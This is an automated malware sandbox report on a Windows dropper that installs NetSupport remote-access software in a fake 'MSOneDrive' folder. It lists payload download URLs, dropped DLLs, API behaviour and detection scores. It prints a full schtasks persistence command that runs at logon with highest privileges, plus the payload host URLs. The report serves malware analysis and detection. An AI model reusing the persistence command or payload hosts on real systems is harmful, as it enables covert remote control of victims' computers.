Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 0000000B.00000002.3743777363.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspO
Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 0000000B.00000002.3743777363.0000000001146000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000003.1671103639.0000000001146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspT
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://ocsp.comodoca.com0
                                Source: remcmdstub.exe.3.drString found in binary or memory: http://ocsp.sectigo.com0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://s2.symcb.com0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
                                Source: client32.exe.3.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://sv.symcd.com0&
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://www.crossteccorp.com
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp118
                                Source: PCICL32.DLL.3.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/1
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/k
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn1.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1318840314.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn1.zipl
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn2.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn2.zip2a
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn3.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zip
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDrive
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipJ
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipL
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipj
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mlm-cdn.com/ssd/sdn4.zipom/ssd/sdn3.zipe4$
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: https://sectigo.com/CPS0
                                Source: remcmdstub.exe.3.drString found in binary or memory: https://sectigo.com/CPS0B
                                Source: pcicapi.dll.3.dr, remcmdstub.exe.3.drString found in binary or memory: https://sectigo.com/CPS0C
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drString found in binary or memory: https://sectigo.com/CPS0D
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: https://www.globalsign.com/repository/06
                                Source: unknown | HTTPS traffic detected: 142.11.212.184:443 -> 192.168.2.7:49700 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard | 11_2_1101DBE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11031300 GetClipboardFormatNameA,SetClipboardData | 11_2_11031300
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard | 11_2_1101DBE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11031300 GetClipboardFormatNameA,SetClipboardData | 13_2_11031300
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard | 13_2_1101DBE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11031080 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock | 11_2_11031080
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11117290 _calloc,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,_malloc,_calloc,Sleep,GetTickCount,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetTickCount,WaitForSingleObject,_memset,_memset,_malloc,_malloc,_memset,_calloc,_calloc,GetSystemPaletteEntries,GetStockObject,SelectPalette,SelectPalette,SelectPalette,RealizePalette,_memset,SelectPalette,DeleteObject,CreatePalette,SelectPalette,RealizePalette,BitBlt,GetObjectA,GetBitmapBits,GetDIBits,_malloc,_free,GetTickCount,GetTickCount,WaitForSingleObject,GetTickCount,WaitForSingleObject,GetTickCount,CloseHandle,_free,_free,_free,_free,SelectObject,DeleteObject,DeleteObject,SelectPalette,DeleteObject,DeleteDC,ReleaseDC,_free,_free,_free | 11_2_11117290
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11106C70 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState | 11_2_11106C70
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11106C70 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState | 13_2_11106C70
                                Source: Yara match | File source: 13.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 11.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: client32.exe PID: 7384, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: client32.exe PID: 7512, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11108CB0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA | 11_2_11108CB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11108CB0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA | 13_2_11108CB0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_111058F0: GetKeyState,DeviceIoControl,keybd_event | 11_2_111058F0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11085430 _memset,GetVersionExA,OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopA,SetProcessWindowStation,CloseWindowStation,SetHandleInformation,SetHandleInformation,SetHandleInformation,_memset,LoadLibraryA,GetProcAddress,IsBadReadPtr,CreateProcessAsUserA,GetProcAddress,FreeLibrary,MsgWaitForMultipleObjects,MsgWaitForMultipleObjects,PeekMessageA,DispatchMessageA,PeekMessageA,DispatchMessageA,PeekMessageA,MsgWaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetLastError,CloseDesktop,GetLastError,SetProcessWindowStation,CloseWindowStation,GetLastError | 11_2_11085430
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess | 11_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess | 13_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Process token adjusted: Security
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: String function: 00C87AE0 appears 33 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 1107C4F0 appears 84 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 111524F0 appears 66 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 111356E0 appears 1159 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 11135EC0 appears 44 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 11027FB0 appears 2033 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 110596B0 appears 52 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 1114EE63 appears 91 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 1115D9F0 appears 74 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 11026600 appears 92 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 6C8030A0 appears 39 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 6C8162C0 appears 68 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 11059580 appears 572 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 110AE510 appears 37 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 11095C10 appears 32 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 6C805910 appears 60 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: String function: 11161E0D appears 40 times
                                Source: wfapigp.dll.3.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: icmp.dll.3.dr | Static PE information: No import functions for PE file found
                                Source: winrsmgr.dll.3.dr | Static PE information: No import functions for PE file found
                                Source: msvcr100_clr0400.dll.3.dr | Static PE information: No import functions for PE file found
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameschtas$ vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameicmp.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxmasf.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewcodstub.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameicmp.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxmasf.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewcodstub.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engine | Classification label: mal80.rans.evad.winEXE@7/34@10/3
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110ED2B0 GetModuleFileNameA, LoadLibraryExA, LoadLibraryExA, GetSystemDirectoryA, LoadLibraryExA, GetLastError, FormatMessageA, LocalFree, _memmove
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11095790 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11095820 AdjustTokenPrivileges, CloseHandle
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11095790 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11095820 AdjustTokenPrivileges, CloseHandle
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1108F8C0 CoInitialize, CLSIDFromProgID, CoCreateInstance, CoUninitialize
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110C3930 IsWindow, IsWindowVisible, SetForegroundWindow, FindResourceExA, LoadResource, LockResource, DialogBoxIndirectParamA, DialogBoxParamA
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11119810 GetMessageA, Sleep, OpenSCManagerA, DispatchMessageA, OpenServiceA, CloseServiceHandle, StartServiceA, GetLastError, CloseServiceHandle, CloseServiceHandle, GetLastError, CloseServiceHandle, GetLastError
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\sdn1[1].zip
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Mutant created: NULL
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Mutant created: \Sessions\1\BaseNamedObjects\gh435hg34f34c3b35n45m5ujf1123s
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | File read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | ReversingLabs: Detection: 68%
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Virustotal: Detection: 54%
                                Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Process created: C:\Users\user\AppData\Local\MSOneDrive\client32.exe C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknown | Process created: C:\Users\user\AppData\Local\MSOneDrive\client32.exe C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: wininet.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: winhttp.dll
